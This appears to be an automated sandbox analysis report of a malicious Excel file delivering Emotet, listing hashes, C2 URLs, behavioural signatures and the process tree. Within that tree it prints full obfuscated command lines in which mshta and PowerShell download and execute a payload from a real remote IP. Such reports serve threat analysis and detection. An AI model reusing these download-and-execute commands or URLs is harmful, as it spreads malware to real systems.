Analysis
max time kernel: 59s
max time network: 51s
platform: windows10_x64
resource: win10-en-20211208
submitted: 28-01-2022 02:39

Behavioral task: behavioral1
Sample: 2022-1-28-5cebfe367350577ffb538c70903fd827.xls
Resource: win7-en-20211208

General
Target: 2022-1-28-5cebfe367350577ffb538c70903fd827.xls
Size: 47KB
MD5: 5cebfe367350577ffb538c70903fd827
SHA1: aa64391e91664013f600192b910f862f31ae5c63
SHA256: 5ef52f4f5deb0e152aa64b4caf544485ce1e2e6b9c492cf7d317668fb3783d4e
SHA512: 70ff6ad683f185f757509b569b8d7b91db614fbd39cce5da3d814f6a6ea56b3c5ed0438cef3da03f411a5e828a013af5633a3301cc90f4f319d36b2b836d2514
Malware Config
Extracted: http://91.240.118.168/vvv/ppp/fe.html
Extracted: http://91.240.118.168/vvv/ppp/fe.png
Extracted: emotet (Epoch4)
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process | target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 3404 | 2652 | CMD.EXE | EXCEL.EXE
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 5 IoCs
Processes:
flow | pid | process
34 | 3596 | mshta.exe
39 | 3776 | powershell.exe
41 | 3776 | powershell.exe
48 | 2484 | rundll32.exe
49 | 2484 | rundll32.exe
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
Processes:
pid | process
2284 | rundll32.exe
3788 | rundll32.exe
Drops file in System32 directory 1 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\SysWOW64\Ofcylinlkzmzzaju\wenp.qya | rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
pid | pid_target | process | target process
2648 | 3596 | WerFault.exe | mshta.exe
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
pid | process
2652 | EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
pid | process
3776 | powershell.exe (3 entries)
2648 | WerFault.exe (14 entries)
2484 | rundll32.exe (2 entries)
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 3776 | powershell.exe
Token: SeDebugPrivilege | 2648 | WerFault.exe
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
pid | process
2652 | EXCEL.EXE (12 entries)
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
description | pid | process | target process
PID 2652 wrote to memory of 3404 | 2652 | EXCEL.EXE | CMD.EXE (2 entries)
PID 3404 wrote to memory of 3596 | 3404 | CMD.EXE | mshta.exe (2 entries)
PID 3596 wrote to memory of 3776 | 3596 | mshta.exe | powershell.exe (2 entries)
PID 3776 wrote to memory of 1536 | 3776 | powershell.exe | cmd.exe (2 entries)
PID 1536 wrote to memory of 2284 | 1536 | cmd.exe | rundll32.exe (3 entries)
PID 2284 wrote to memory of 3788 | 2284 | rundll32.exe | rundll32.exe (3 entries)
PID 3788 wrote to memory of 1276 | 3788 | rundll32.exe | rundll32.exe (3 entries)
PID 1276 wrote to memory of 2484 | 1276 | rundll32.exe | rundll32.exe (3 entries)
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (depth 1)
  cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\2022-1-28-5cebfe367350577ffb538c70903fd827.xls"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  C:\Windows\SYSTEM32\CMD.EXE (depth 2)
    cmdline: CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\mshta.exe (depth 3)
      cmdline: mshta http://91.240.118.168/vvv/ppp/fe.html
      - Blocklisted process makes network request
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 4)
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\cmd.exe (depth 5)
          cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
          - Suspicious use of WriteProcessMemory
          C:\Windows\SysWow64\rundll32.exe (depth 6)
            cmdline: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
            - Loads dropped DLL
            - Suspicious use of WriteProcessMemory
            C:\Windows\SysWOW64\rundll32.exe (depth 7)
              cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
              - Loads dropped DLL
              - Drops file in System32 directory
              - Suspicious use of WriteProcessMemory
              C:\Windows\SysWOW64\rundll32.exe (depth 8)
                cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ofcylinlkzmzzaju\wenp.qya",xjAprKGuLS
                - Suspicious use of WriteProcessMemory
                C:\Windows\SysWOW64\rundll32.exe (depth 9)
                  cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Ofcylinlkzmzzaju\wenp.qya",DllRegisterServer
                  - Blocklisted process makes network request
                  - Suspicious behavior: EnumeratesProcesses
      C:\Windows\system32\WerFault.exe (depth 4)
        cmdline: C:\Windows\system32\WerFault.exe -u -p 3596 -s 1660
        - Program crash
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\ProgramData\QWER.dll
MD5: 91889bc1858d4b5983c747be7e47fae7
SHA1: 89bd70beecf51a83f0e9632e361847fddc9cf7aa
SHA256: 23505b3556126c255502fe868283b2e93a0f5e051400c55d80c87a1e760c3be9
SHA512: 8dacda8b1cc46454c394ed4275166db3aad8c45b9fcc4a8a4719e3613cce2ace2d3c9c59c5ede2e50e80b49ab989960e6fe3509db6d2874d017d931452d027fd